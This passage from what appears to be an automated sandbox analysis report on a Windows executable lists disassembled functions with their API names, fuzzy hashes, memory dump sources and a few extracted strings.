                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                          • String ID:
                          • API String ID: 1137671866-0
                          • Opcode ID: 88445e0129e065253ce0f33a9011623327727bb64f50aa72950859709c100b27
                          • Instruction ID: 57e147054d93cb8edb0254c1bd1275c11221696abb14118e99724add20480f4d
                          • Opcode Fuzzy Hash: 88445e0129e065253ce0f33a9011623327727bb64f50aa72950859709c100b27
                          • Instruction Fuzzy Hash: 61A160A2A18E8281FA10FB65FC411AFA371FB857A4FD05131EA5D07A99DF3CE548D710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                          • Instruction ID: c2ee052cad23a1d5f82b1e957a16accd76f93d53449f9549ae2c8a4adba28f86
                          • Opcode Fuzzy Hash: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                          • Instruction Fuzzy Hash: 1951C472B14E4285FB00AB74EC452FEA362EB85BB8F804135DA1D5779AEF2CD548D360
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                          • String ID:
                          • API String ID: 1077098981-0
                          • Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                          • Instruction ID: f51bba8f256e3da40b6eeb05d1bf8d01f2db3855b314aa2540ed268a5ba4c5b7
                          • Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                          • Instruction Fuzzy Hash: A4515032618B4286F740AF21F8447AEB7B5FB85BA4F901035EA4E57A58EF3CD408DB10
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 4141327611-0
                          • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                          • Instruction ID: 464a0e039aef26c22ec724204195ea7bf20e76f018988176e2466ff77d03865f
                          • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                          • Instruction Fuzzy Hash: D3419573E08E4246FF61AA55B84037BE290AF41BB0FD48135DA4D47AD5EF6CD449A620
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileMove_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3823481717-0
                          • Opcode ID: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                          • Instruction ID: 26a166a0071f4e7c7f9c828cc152cf9c00b3eab100dfcb2efe87e4909dc25acf
                          • Opcode Fuzzy Hash: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                          • Instruction Fuzzy Hash: B441E162F10B5184FF00EB79EC441AEA372BB45BB4B905235DE1D57AA9EF38C048D310
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150B91
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150BF3
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150C2D
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150C57
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                          • String ID:
                          • API String ID: 1557788787-0
                          • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                          • Instruction ID: 2741be648dbc0f75b2644c5689700c8c3ada98c8d0263f274d1880ddd3f8386c
                          • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                          • Instruction Fuzzy Hash: EE21A431E18F5181F664AF15B84002AE6B4FB56BE1B894174DE8E63BA8DF3CD456D320
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLast$abort
                          • String ID:
                          • API String ID: 1447195878-0
                          • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                          • Instruction ID: e6ef1bb9b4a3d2f8e666e2145b718441fbc3c5c70e7fc183639dc95e49b8929c
                          • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                          • Instruction Fuzzy Hash: CC013935E09E4242FE587725BD5A13B91A15F447F0FD80438D91E43BD6FF2CB808A220
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                          • Instruction ID: acf0c3322858b26dee80c6dfa22a488cc97abdb3eb72a1db394757ef9f69b602
                          • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                          • Instruction Fuzzy Hash: 4EE0ED60F09E0282FF087B717C59137A191AF4C762F984439C81F8A350DE3CA88D9720
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: DXGIDebug.dll
                          • API String ID: 3668304517-540382549
                          • Opcode ID: 0987c429807df35fdd24896527435974459c4b9b81a0ebe1677a01cdcabc3dd8
                          • Instruction ID: 8de3a492de40fdd271c263aee4ebd1b18f5067280d1b71b38ceb0e64d4d2f19f
                          • Opcode Fuzzy Hash: 0987c429807df35fdd24896527435974459c4b9b81a0ebe1677a01cdcabc3dd8
                          • Instruction Fuzzy Hash: E171CD72A14B8182EB14DB65F8403AEB3A5FB547A4F944235DFAC03B95DF78E065D300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: e+000$gfff
                          • API String ID: 3215553584-3030954782
                          • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                          • Instruction ID: afbf172e2e0710a63a90eb56d844bb57bb71fde5dd7f5b04df8e1ae200946a30
                          • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                          • Instruction Fuzzy Hash: 4D512972B1CBC246F7259F35AC4076AAB91E741BA0F889231C69C87BD6DF2CD448D710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                          • String ID: SIZE
                          • API String ID: 449872665-3243624926
                          • Opcode ID: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                          • Instruction ID: 259594d283a002a44b0e9f2b3e0a2684034c25f1070c9f781f81aaaba303ce47
                          • Opcode Fuzzy Hash: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                          • Instruction Fuzzy Hash: E641A772A18A8285FA10EB29F8413BFA352EF857F1F904636E69D026D5EF3CD548D710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Users\user\Desktop\bFZYRLnRIz.exe
                          • API String ID: 3307058713-58610444
                          • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                          • Instruction ID: 8e67e3463bd03e98c3c7a824bd26615620d266113df9c58e8de98b90467cc8b3
                          • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                          • Instruction Fuzzy Hash: 44417F72A08E5286FB15EF25BC401BAB7E5EB447E4B844031E94D47B45EF3DE449E360
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Item$Text$Dialog
                          • String ID: ASKNEXTVOL
                          • API String ID: 2638039312-3402441367
                          • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                          • Instruction ID: 60db427630cf82689fbdde6c2c8a988592f56ee86006e4c3a9287ceb6ffdfb15
                          • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                          • Instruction Fuzzy Hash: 0C418962A0CE4241FA10BB25FD501BBE7A1AF85BF0F944435DE4E077A5DE3CD449A360
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_snwprintf
                          • String ID: $%s$@%s
                          • API String ID: 2650857296-834177443
                          • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                          • Instruction ID: 1b13279bf44ca8789f001dd1ff5b02bc570c1f9edd30f8b676c040e0b8518e49
                          • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                          • Instruction Fuzzy Hash: 9F31B872B18E8686FA10AF6AF8406EAA3A2FB457E4F901036DE0D07755DF3CD509D750
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID: @
                          • API String ID: 3000768030-2766056989
                          • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                          • Instruction ID: d84413e80e5756913269f7cad9577a1a533d6d1e024f83ab53545739f2fae08d
                          • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                          • Instruction Fuzzy Hash: A0218432A0CF8241FB609B25AC9013AA651EB85774F694335DAAF077D4EF39D885E311
                          APIs
                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF716141D3E), ref: 00007FF7161440BC
                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF716141D3E), ref: 00007FF716144102
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
